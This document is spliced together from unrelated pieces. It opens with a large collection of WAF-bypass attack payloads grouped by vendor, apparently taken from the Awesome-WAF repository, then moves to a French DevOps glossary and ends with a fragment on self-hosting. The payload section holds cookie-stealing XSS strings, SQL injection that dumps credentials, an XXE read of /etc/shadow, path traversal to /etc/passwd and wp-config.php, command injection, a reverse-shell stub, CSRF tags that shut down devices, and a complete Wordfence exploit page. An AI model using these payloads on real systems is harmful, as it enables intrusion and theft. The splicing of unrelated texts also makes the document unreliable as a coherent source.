http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e

Cloudflare

<svg onx=() onload=(confirm)(1)>
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
1'"><img/src/onerror=.1|alert``>
<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>`
<--`<img/src=` onerror=confirm``> --!>
javascript:{alert`0`}
<base href=//knoxss.me?
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x 
cat$u+/etc$u/passwd$u
/bin$u/bash$u <ip> <port>
";cat+/etc/passwd+#

Cloudbric

<a69/onclick=[1].findIndex(alert)>pew

Comodo

<input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
0 union/**/select 1,version(),@@datadir

DotDefender

PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
<enabled>false</enabled>
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
GET /c?a=<script> HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
<script>alert(1)</script>: aa
Keep-Alive: 300
<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>
<p draggable=True ondragstart=prompt()>alert
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme
<a69/onclick=[1].findIndex(alert)>click
/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E

<img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
h%2Bn)(/0wn3d/.source)" />
<img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
.source)" />
/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ 

Fortinet Fortiweb

/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0 

POST Type Query

POST /<path>/login-app.aspx HTTP/1.1
Host: <host>
User-Agent: <any valid user agent string>
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: <the content length must be at least 2399 bytes>

var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>

GET Type Query

http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>

F5 ASM

<table background="javascript:alert(1)"></table>
"/><marquee onfinish=confirm(123)>a</marquee>

F5 BIG-IP

<body style="height:1000px" onwheel="[DATA]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss"onshow="prom%25%32%33%25%32%36x70;t(1)“>
https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143

<?xml  version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>

Read Arbitrary File

/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd

Delete Arbitrary File

POST /tmui/Control/form HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
Content-Type: application/x-www-form-urlencoded

_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete

F5 FirePass

state=%2527+and+
(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+ 

ModSecurity

<a href="jav%0Dascript&colon;alert(1)">
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')
1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-
amUserId=1 union select username,password,3,4 from users
%0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201
1%0bAND(SELECT%0b1%20FROM%20mysql.x)
%40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29
%0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201

Imperva

<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<a69/onclick=write&lpar;&rpar;>pew
<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
<svg onload\r\n=$.globalEval("al"+"ert()");>
<svg/onload=self[`aler`%2b`t`]`1`>
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1

Kona SiteDefender

%3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E
asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie)
%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E
<body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)"
?"></script><base%20c%3D=href%3Dhttps:\mysite>
<abc/onmouseenter=confirm%60%60>
%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E
<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

Profense

Turn off Proface Machine

<img src=https://host:2000/ajax.html?action=shutdown>

Add a proxy

<img src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>
https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>
%3CEvil%20script%20goes%20here%3E=%0AByPass
%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E 

QuickDefense

?<input type="search" onsearch="aler\u0074(1)">
<details ontoggle=alert(1)>

Sucuri

<a href=javascript&colon;confirm(1)>
/???/??t+/???/??ss??
;+cat+/e'tc/pass'wd
c\\a\\t+/et\\c/pas\\swd
"><input/onauxclick="[1].map(prompt)">
data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post>
<input type=hidden name=a value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>">
<input type=submit></form>

StackPath

<object/data=javascript:alert()>
<a/href="javascript%0A%0D:alert()>clickme

URLScan

http://host.com/test.asp?file=.%./bla.txt

WebARX

<a69/onauxclick=open&#40&#41>rightclickhere

WebKnight

<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<img src=x onwheel=prompt(1)>
0 union(select 1,username,password from(users))
0 union(select 1,@@hostname,@@datadir)
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

Wordfence

<a href=javas&#99;ript:alert(1)>
<a href=&#01javascript:alert(1)>
<a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At&colon;/**/alert()/**/>click
http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
<html>
<head>
<title>Wordfence Security XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
<input type="hidden" name="email" 
value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>

Apache Generic

get /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

IIS Generic

    GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Awesome Tools

Fingerprinting:

Testing:

Evasion:

Management:

Blogs and Writeups

Many of the content mentioned above have been taken from some of the following excellent writeups.

Video Presentations

Presentations & Research Papers

Research Papers:

Presentations:

Credits & License:

Initial fingerprint compilation and bypasses were put together by Pinaki (0xInfection), but now it largely remains as a community supported repository. Awesome-WAF is licensed under the Apache 2.0 License.

Informatique

Glossaire DevOps

Formation-Devops-Webitech.png

Agile

Un framework agile une structure méthodologique qui fournit des lignes directrices, des pratiques, et des processus pour aider les équipes à organiser, planifier, exécuter et suivre leur travail de manière itérative et collaborative. Ce développement itératif découpe un projet en sous-projets pour lesquels, on se fixe des objectifs à court termes atteignables. Ces sous-projets sont appelés des sprints et sont de courtes durées.

Le but d’un framework agile est de livrer rapidement au client une première version du produit qui correspond à ses besoins, qui évoluera ensuite au fil des versions.

Framework agiles : Scrum, eXtrem Programming, …

Air Gap

“Air Gap” (littéralement « coupure d’air ») est une mesure de sécurité dans laquelle un ordinateur ou un réseau est isolé physiquement de tout autre réseau, y compris Internet. Cette isolation est souvent réalisée en s’assurant qu’aucune connexion physique ou sans fil ne relie l’ordinateur ou le réseau en question à des systèmes externes. L’idée est de protéger les données et les systèmes contre les accès non autorisés, les cyberattaques et les logiciels malveillants en éliminant toute voie d’accès directe.

Artefacts

Les artefacts sont des éléments générés lors du processus d’intégration continue à partir d’un code source. Il peut être composé de bibliothèques, de fichiers de configuration, d’exécutables, de fichiers de documentation, etc.

Adresse IP

Les adresses IP sont des identifiants numériques attribués aux dispositifs connectés à un réseau, leur permettant de communiquer entre eux sur Internet ou au sein d’un réseau local.

API

Une API, ou Interface de Programmation d’Applications (Application Programming Interface), est un ensemble de règles et de protocoles pour la construction et l’interaction de logiciels. Elle permet à différents programmes ou composants logiciels de communiquer entre eux. Une API définit la manière dont les fonctions d’un programme peuvent être utilisées par d’autres programmes, facilitant ainsi leur intégration et leur interaction sans avoir besoin de connaître les détails de leur mise en œuvre interne. Cela rend les processus de développement plus rapides et plus flexibles, permettant aux développeurs de créer des applications complexes et interconnectées.

Automatisation

Fonctionnement d’un système sans intervention humaine, automatisation d’une suite d’opération. Elle peut être faîte via l’utilisation de scripts et/ou d’outils qui vont permettre de réduire la charge de travail manuelle et accélérer les tâches répétitives. Autre avantage, elle limite la part des incidents dus à des erreurs humaines.

Build

Le build est la phase appelée aussi intégration. Elle consiste à assembler le code des développeurs avec toutes ses dépendances afin de fournir un livrable de l’application. Dans cette phase, on retrouve, l’analyse du code (lint), les tests unitaires et la compilation.

CaaS

CaaS, ou Container as a Service, est un modèle de service cloud qui permet aux utilisateurs de télécharger, organiser, exécuter, échelonner, gérer et arrêter des conteneurs en utilisant une plateforme d’hébergement basée sur le cloud.

Campagne de patchs

Une campagne de patch est un processus visant à appliquer des correctifs (patches) améliorant la sécurité et la stabilité à un ensemble de systèmes, de logiciels ou d’infrastructures informatiques de manière coordonnée. Ces correctifs sont conçus pour résoudre des failles de sécurité, des bogues ou pour améliorer les performances d’un logiciel ou d’un système.

CI/CD

CI/CD (Continuous Integration / Continuous Deployment) : Pratiques visant à automatiser le processus d’intégration, de test et de déploiement pour livrer rapidement et régulièrement des mises à jour logicielles.

CLI

Une CLI, ou Command Line Interface (Interface en Ligne de Commande), est une interface utilisateur qui permet aux utilisateurs d’interagir avec un logiciel ou un système d’exploitation en tapant des commandes textuelles dans un terminal ou une console.

Cloud

Le cloud fait référence à la fourniture de services informatiques tels que le stockage, le calcul, les bases de données, la mise en réseau, l’analyse, etc., via Internet. Plutôt que de posséder et de gérer physiquement des serveurs et des infrastructures informatiques, les entreprises et les individus peuvent accéder à ces ressources à partir de serveurs distants exploités par des fournisseurs de cloud publics.

Cloud Hybride

Un cloud hybride est un environnement informatique qui combine à la fois des ressources de cloud public et de cloud privé, permettant aux données et aux applications de s’exécuter de manière transparente entre les deux. Concrètement, cela signifie que les entreprises peuvent déployer des applications et des données à la fois sur des serveurs et des infrastructures internes (cloud privé) et sur des ressources de cloud public, le tout dans un environnement cohérent.

Cluster

Un cluster est un groupe de machines (nœuds) interconnectées qui travaillent ensemble pour exécuter des applications conteneurisées. Dans le cadre de Kubernetes, un cluster est constitué d’un plan de contrôle (control plane) et de plusieurs nœuds de travail. Les clusters offrent une haute disponibilité et une scalabilité en répartissant les charges de travail sur plusieurs machines.

CMP

Une CMP (Cloud Management Platform) désigne une plateforme logicielle conçue pour gérer et orchestrer les ressources, services et opérations dans un environnement cloud.

Conteneurs / Conteneurisation

Un conteneur est une unité d’exécution autonome qui regroupe une application, ses dépendances logicielles et toutes les ressources nécessaires à son exécution, y compris des bibliothèques, des fichiers de configuration et des variables d’environnement. Les conteneurs sont conçus pour isoler une application et son environnement de manière à ce qu’elle puisse être déployée et exécutée de manière cohérente. Cette technologie permet de porter une application sur n’importe quel serveur, local ou dans le cloud, à la seule condition de posséder la même architecture et la même famille de système d’exploitation.

CRD (Custom Resource Definition)

Une CRD permet de définir des ressources personnalisées dans Kubernetes. Cela permet aux utilisateurs d’étendre les fonctionnalités de Kubernetes en ajoutant de nouveaux types d’objets spécifiques à leurs besoins.

Déclaratif vs Impératif

Dans une approche déclarative, le code de configuration décrit l’état dans lequel l’environnement de production doit se trouver, sans prendre en compte les étapes pour y arriver. Le système fait en sorte que l’infrastructure atteigne l’état désiré.

Dans une approche impérative, le fichier de configuration définit les commandes et les étapes nécessaires pour que l’environnement parvienne à l’état désiré. Le système réalise les commandes indiquées. Exemple : Ansible

Déploiement Blue-Green

Une méthode de déploiement qui permet de basculer en douceur entre deux environnements (bleu et vert) pour minimiser les interruptions de service.

Déploiement Continu

Déploiement ou livraison continue est une méthode de développement de logiciels dans le cadre de laquelle les modifications de code sont automatiquement préparées en vue de leur publication dans un environnement de production. La livraison continue étend le principe de l’intégration continue en déployant tous les changements de code dans un environnement de test et/ou de production après l’étape de création. Lorsque la livraison continue est correctement implémentée, les développeurs disposent en permanence d’un artefact de génération prêt pour le déploiement qui a été soumis avec succès à un processus de test standardisé.

Dette Technique

La dette technique est une métaphore utilisée pour décrire le coût caché associé au retard ou à la négligence des bonnes pratiques de développement, de maintenance et de gestion des systèmes informatiques. Cela se produit lorsque des raccourcis, des compromis ou des décisions techniques inadéquates sont pris pour accélérer le développement d’un logiciel ou pour répondre à des échéances serrées. La dette technique est le reflet des conséquences négatives de ces choix à long terme.

DevSecOps

Intégration de la sécurité dans les pipelines CI/CD dès le début du développement.

Edge Computing

Le Edge Computing est une architecture informatique décentralisée qui rapproche les ressources de calcul et de traitement des données des périphériques ou des utilisateurs finaux. Cette approche est couramment utilisée pour réduire la latence et la consommation de bande passante dans des environnements distribués comme l’IoT ou les systèmes connectés.

Élasticité

L’élasticité est la capacité d’un système informatique d’ajuster dynamiquement les ressources (comme la puissance de calcul, la mémoire, le stockage, etc.) en fonction de la demande des utilisateurs.

Élévation de privilèges

L’élévation de privilèges (ou privilege escalation en anglais) fait référence au processus par lequel un utilisateur ou un processus tente d’acquérir des privilèges ou des autorisations supplémentaires au sein d’un système informatique, lui permettant ainsi d’exécuter des actions pour lesquelles il n’avait pas initialement les droits.

L’élévation de privilèges est également un sujet important dans le domaine de la sécurité informatique, car les vulnérabilités qui permettent une élévation de privilèges peuvent être exploitées pour compromettre la sécurité d’un système. Les correctifs de sécurité sont souvent publiés pour corriger de telles vulnérabilités et empêcher les attaquants d’acquérir des privilèges non autorisés.

Gestion des configurations

La gestion de configuration est un concept fondamental dans l’administration des systèmes et des infrastructures informatiques. Elle englobe l’ensemble des processus et des outils utilisés pour définir, mettre en place, surveiller et maintenir les configurations, qu’il s’agisse de serveurs, de postes de travail, de logiciels ou d’équipements réseaux.

Gestionnaire de Contrôle de version

Un gestionnaire de contrôle de version, également appelé logiciel de gestion de version ou système de contrôle de version (VCS), est un outil informatique qui permet de suivre et de gérer les modifications apportées à un ensemble de fichiers au fil du temps. Son principal objectif est de faciliter la collaboration entre plusieurs personnes travaillant sur un même projet informatique, que ce soit un logiciel, un site web, une documentation. Le plus utilisé actuellement s’appelle Git.

Gestion des secrets

La gestion des secrets désigne la pratique permettant de gérer de manière sécurisée les informations sensibles, telles que les mots de passe, les clés d’authentification, les jetons d’accès, les clés de chiffrement et d’autres données confidentielles, utilisées dans les applications, les systèmes et les infrastructures informatiques.

Cette pratique est essentielle pour garantir la sécurité des systèmes d’informations, car toute faille dans la protection de ces données pourrait entraîner des violations de sécurité, des accès non autorisés, des pertes de données…

Haute Disponibilité

La haute disponibilité (HA) est un concept en informatique qui se réfère à la capacité d’un système, d’une application ou d’un service à rester opérationnel et accessible pendant une période de temps prolongée, généralement 24 heures sur 24 et 7 jours sur 7. L’objectif de la haute disponibilité est de minimiser les temps d’arrêt non planifiés, d’assurer la continuité des opérations et de garantir que les utilisateurs finaux puissent accéder aux ressources informatiques sans interruption notable.

Pour atteindre un haut niveau de disponibilité, les organisations mettent en place des architectures redondantes, des clusters, des systèmes de basculement et des tests rigoureux de continuité des opérations. Cela garantit que les systèmes restent opérationnels même en cas de défaillance matérielle, de coupures d’électricité, de catastrophes naturelles ou de cyberattaques.

Helm

Helm est un gestionnaire de packages pour Kubernetes. Il permet de simplifier l’installation, la gestion et la mise à jour des applications Kubernetes en utilisant des charts (modèles de déploiement). Helm est particulièrement utile pour déployer des applications complexes avec des dépendances multiples.

IAAS

IaaS est l’acronyme de “Infrastructure as a Service”, qui se traduit en français par “Infrastructure en tant que Service”. Il s’agit d’un modèle de cloud qui aux utilisateurs de provisionner des ressources d’infrastructures informatiques sous forme de services.

Idempotence

En algèbre, l’idempotence est la propriété d’une opération, d’avoir le même effet qu’on l’applique une ou plusieurs fois. Par exemple, la valeur absolue est idempotente : abs(abs(−5)) = abs(−5), les deux membres étant égaux à 5.

En programmation une fonction est idempotente si l’état du système reste le même après un ou plusieurs appels.

Infrastructure as Code

L’infrastructure en tant que code (Infrastructure as Code) est une infrastructure informatique virtuelle qui est créée, configurée et approvisionnée automatiquement via du code informatique.

Intégration Continue

CI ou intégration continue est une méthode de développement avec laquelle les développeurs intègrent régulièrement leurs modifications de code à un référentiel centralisé, suite à quoi des opérations de création et de tests sont automatiquement menés. L’intégration continue désigne souvent l’étape de création ou d’intégration du processus de publication de logiciel et implique un aspect automatisé. Les principaux objectifs de l’intégration continue sont de trouver et de corriger plus rapidement les bogues, d’améliorer la qualité des logiciels et de réduire le temps nécessaire pour valider et publier de nouvelles mises à jour de logiciels.

IPAM

IPAM, acronyme de “IP Address Management” (Gestion des adresses IP en français), est un ensemble de pratiques, de techniques et d’outils utilisés pour planifier, gérer et suivre les adresses IP (Internet Protocol) au sein d’un réseau informatique.

Load balancing ou équilibrage de charge

Un équilibrage de charge, en anglais “load balancer”, est un composant matériel ou logiciel utilisé dans les environnements informatiques pour distribuer le trafic réseau entrant de manière équilibrée entre plusieurs serveurs ou ressources, afin d’optimiser les performances, la fiabilité et la disponibilité des systèmes.

Microservices vs Monolithe

Une architecture microservices est une architecture logicielle basée sur de petits services autonomes qui peuvent être développés, déployés et évolués indépendamment. Cette architecture s’appuie sur des orchestrateurs de conteneurs.

Un monolithe est une architecture logicielle où l’ensemble de l’application est conçu et construit comme une seule entité monolithique. Cela signifie que toutes les fonctionnalités, les composants et les parties de l’application sont regroupés en un seul code source, une seule base de données et un seul exécutable.

Mutabilité vs Immutabilité

Immutabilité : Caractère de ce qui ne peut changer.

Une infrastructure mutable est un système qui évolue de manière incrémentale et donc mise à jour de manière continue. L’état de l’infrastructure est le résultat d’une accumulation d’opérations pouvant être pour certaines manuelles.

Par contre, une infrastructure immutable est un système qui n’est jamais modifié après son déploiement. Ce système devra en conséquence avoir le moins de mutation possible, voire aucune.

Par exemple, pour construire des images de VM immutables, vous pouvez utiliser Packer d’HashiCorp pour ensuite les enregistrer en les versionnant dans votre gestionnaire d’Artéfacts.

NOC

Un NOC (Network Operations Center) est un centre opérationnel chargé de surveiller, gérer et maintenir un réseau informatique ou de télécommunications. Les équipes du NOC supervisent les performances du réseau, détectent et résolvent les problèmes et effectuent la maintenance préventive pour assurer le bon fonctionnement continu du réseau.

Observabilité

L’observabilité est la capacité de surveiller, d’analyser et de comprendre l’état interne d’un système informatique en temps réel. Elle repose sur trois piliers principaux : les logs, les métriques et les traces. Des outils comme Prometheus et Grafana sont souvent utilisés pour l’observabilité.

Orchestration

L’orchestration est un processus automatique de gestion d’un système informatique.

RPO

Recovery Point Objective (RPO) fait généralement référence à la quantité de données qui peuvent être perdues au cours de la période la plus opportune pour une entreprise, avant qu’un préjudice important ne se produise, à partir d’un événement critique jusqu’à la sauvegarde la plus précédente.

RTO

Recovery Time Objective (RTO) fait référence au temps pendant lequel une application, un système et/ou un processus peut être en panne sans causer de dommages importants à l’entreprise, ainsi qu’au temps passé à restaurer l’application et ses données.

PAAS

PaaS, ou “Platform as a Service” en anglais, se traduit en français par “Plateforme en tant que Service”. C’est un modèle de cloud qui fournit une plateforme de développement et d’exécution d’applications sur le cloud. Ces services vont permettre aux développeurs de créer, déployer et gérer des applications sans se soucier de la gestion de l’infrastructure sous-jacente.

Provisioning ou Provisionnement

Le provisioning est un processus d’allocation automatique de ressources informatiques.

SAAS

SaaS, ou “Software as a Service” en anglais, se traduit en français “logiciel en tant que service”. C’est un modèle de distribution de logiciels dans lequel les applications sont hébergées et accessibles en ligne par le biais d’un fournisseur de services cloud. Au lieu d’installer et de gérer des logiciels localement sur un ordinateur ou un serveur, les utilisateurs peuvent accéder à ces applications via Internet, généralement à partir d’un navigateur web.

Scrum

Un framework de gestion de projet Agile.

Serverless

Le Serverless est un modèle de déploiement dans lequel les développeurs n’ont pas à gérer l’infrastructure sous-jacente. Les fournisseurs cloud allouent dynamiquement les ressources nécessaires à l’exécution d’une application. Les exemples incluent AWS Lambda, Google Cloud Functions, et Azure Functions.

Service Mesh

Un Service Mesh est une infrastructure dédiée à la gestion des communications entre microservices. Il fournit des fonctionnalités comme le load balancing, la gestion des échecs, le monitoring, et la sécurisation des connexions via des proxies. Les outils populaires incluent Istio et Linkerd.

SLA/SLO/SLI

SOC

Un SOC (Security Operations Center) est similaire, mais se concentre spécifiquement sur la sécurité informatique. Les équipes d’un SOC surveillent les menaces potentielles, détectent les activités suspectes, répondent aux incidents de sécurité et mettent en œuvre des mesures de défense pour protéger les systèmes informatiques et les données contre les cyberattaques.

Supervision

La supervision est un processus de surveillance et de gestion des systèmes informatiques, des réseaux, des serveurs, des applications et d’autres composants de l’infrastructure informatique. Elle vise à garantir que ces systèmes fonctionnent de manière fiable, sécurisée et efficace. La supervision informatique peut être effectuée à l’aide de logiciels spécialisés qui collectent des données en temps réel sur les performances et l’état des équipements informatiques.

Virtualisation

La virtualisation est une technologie qui permet de créer des versions virtuelles de tous éléments d’une infrastructure informatique comme des serveurs, des équipements réseaux ou d’autres entités informatiques. Elle vise à isoler et à abstraire ces éléments pour les rendre indépendants des ressources physiques sous-jacentes, ce qui permet une utilisation plus efficace et flexible de ces ressources.

Elle est couramment utilisée dans des domaines tels que la virtualisation de serveur, la virtualisation de stockage, la virtualisation de réseau, la virtualisation de bureau et plus encore.

Vulnérabilité

Une vulnérabilité est une faiblesse du code qui introduit ce qu’on appelle une faille de sécurité. Ces failles peuvent être présentes dans un système d’exploitation, un logiciel, un équipement de réseau ou un processus. Elles peuvent être exploitées par des acteurs malveillants pour causer un dommage, un accès non autorisé, des pertes de données, ou d’autres problèmes de sécurité.

Pour détecter la présence des vulnérabilités, on fait appel à des outils d’analyse de code et de détection.

Informatique

What Is Self-Hosting?

The act of providing or serving digital content or an online service typically delivered by a business.

The service or content is generally served locally from your own hardware. Often "self-hosters" use older Enterprise-grade hardware from their home internet connections however they also use other hosting providers hardware. This is still considered self-hosting.


